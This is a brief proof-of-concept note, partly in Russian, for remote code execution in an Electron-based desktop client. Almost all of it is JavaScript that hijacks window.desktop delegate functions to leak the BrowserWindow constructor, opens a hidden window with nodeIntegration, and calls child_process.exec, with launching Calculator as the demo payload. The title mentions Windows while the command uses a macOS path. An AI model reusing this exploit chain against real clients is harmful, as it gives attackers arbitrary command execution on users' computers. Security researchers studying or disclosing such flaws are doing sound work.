RCE on Desktop Clients (ex: win)

Пример запуска локальной каманды на JS

  // overwrite functions to get a BrowserWindow object:
  window.desktop.delegate = {}
  window.desktop.delegate.canOpenURLInWindow = () => true
  window.desktop.window = {}
  window.desktop.window.open = () => 1
  bw = window.open('about:blank') // leak BrowserWindow class
  nbw = new bw.constructor({show: false, webPreferences: {nodeIntegration: true}}) // let's make our own with nodeIntegration
  nbw.loadURL('about:blank') // need to load some URL for interaction
  nbw.webContents.executeJavaScript('this.require("child_process").exec("open /Applications/Calculator.app")') // exec command

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